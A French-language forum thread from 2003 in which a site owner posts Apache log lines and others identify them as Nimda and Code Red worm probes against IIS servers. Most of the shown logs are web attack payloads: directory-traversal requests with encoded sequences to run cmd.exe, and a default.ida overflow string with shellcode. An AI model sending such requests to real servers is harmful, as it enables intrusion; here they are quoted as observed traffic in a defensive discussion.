jeey Posted August 10, 2003 Share Posted August 10, 2003 Bonjour, J'ai remarqué quelques lignes étranges dans mes logs d'Apache (win32...). Qu'est-ce-donc ?? Un petit vicieux ??? : 81.130.173.187 - - [08/Aug/2003:15:51:35 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 313 81.130.173.187 - - [08/Aug/2003:15:51:36 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 311 81.130.173.187 - - [08/Aug/2003:15:51:40 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 81.130.173.187 - - [08/Aug/2003:15:51:40 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 81.130.173.187 - - [08/Aug/2003:15:51:41 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 81.130.173.187 - - [08/Aug/2003:15:51:42 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352 81.56.162.211 - - [08/Aug/2003:19:36:24 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 308 213.228.21.109 - - [08/Aug/2003:21:18:27 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 313 213.228.21.109 - - [08/Aug/2003:21:18:35 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 311 81.77.156.220 - - [08/Aug/2003:22:35:49 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 308 81.248.119.178 - - [08/Aug/2003:23:20:02 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 308 81.10.4.53 - - [09/Aug/2003:09:53:45 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 - 81.56.192.20 - - [09/Aug/2003:11:05:34 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 313 81.56.192.20 - - [09/Aug/2003:11:05:43 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 311 81.56.192.20 - - [09/Aug/2003:11:05:52 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 81.56.192.20 - - [09/Aug/2003:11:06:02 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 81.56.192.20 - - [09/Aug/2003:11:06:11 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 81.56.192.20 - - [09/Aug/2003:11:06:21 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352 81.56.192.20 - - [09/Aug/2003:11:06:31 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352 81.56.192.20 - - [09/Aug/2003:11:06:40 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 368 81.56.192.20 - - [09/Aug/2003:11:06:50 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 81.56.192.20 - - [09/Aug/2003:11:07:00 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 81.56.192.20 - - [09/Aug/2003:11:07:10 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 81.56.192.20 - - [09/Aug/2003:11:07:19 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 81.56.192.20 - - [09/Aug/2003:11:07:29 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 318 81.56.192.20 - - [09/Aug/2003:11:07:39 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 318 81.56.192.20 - - [09/Aug/2003:11:07:48 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 81.56.192.20 - - [09/Aug/2003:11:07:59 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 Alors c'est grave docteur ? Link to comment Share on other sites More sharing options...
Dark26 Posted August 10, 2003 Share Posted August 10, 2003 c'est des hackers tout simplement en gros tu vois qu'il essaie de lancer cmd sur ta bécane... dans éxecuter tape cmd et tu vera ce qui se passe Link to comment Share on other sites More sharing options...
jeey Posted August 10, 2003 Author Share Posted August 10, 2003 J'ai eu ma reponse, il s'agit des requètes d'un vers (nimda entre autre) attaquant les serveurs IIS... Donc, il peut toujours chercher ! Link to comment Share on other sites More sharing options...
glenux Posted August 10, 2003 Share Posted August 10, 2003 ca te fais combien de requettes / semaine ? j'en suis à 9300 (et des poussieres) requettes comportant default.ida et cmd.exe par semaine... (et j'en ai marre) Heureusement que je paie pas pour l'upload... Le probleme de tout ca, c'est que la machine contaminée n'as pas conscience de l'etre. (il faudrait peut etre faire une black-list vérifiée tout les X jours pour dropper les paquets de ces machines sur ces ports...) Le pire : La derniere fois que j'ai contacté un admin pour lui dire qu'il y avait un prob et lui indiquer les faille de sécu, les exploits utilisables et les patchs adequats, c'était limite si le gars allait pas porter pleinte contre moi pour hacking... Link to comment Share on other sites More sharing options...
jeey Posted August 11, 2003 Author Share Posted August 11, 2003 pfiou ! pas tant que ça ! Mais mon serveur n'est en place que depuis 15 jours... Link to comment Share on other sites More sharing options...
Harko Posted August 12, 2003 Share Posted August 12, 2003 Ben, y a des firewalls pour éviter sa Faut filtrer la connection sinon c'est clair qu'il y aura tentative d'attaque Link to comment Share on other sites More sharing options...
FiLoUs_64 Posted August 12, 2003 Share Posted August 12, 2003 juste pour moi linculte ca fait quoi cmd? lol Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.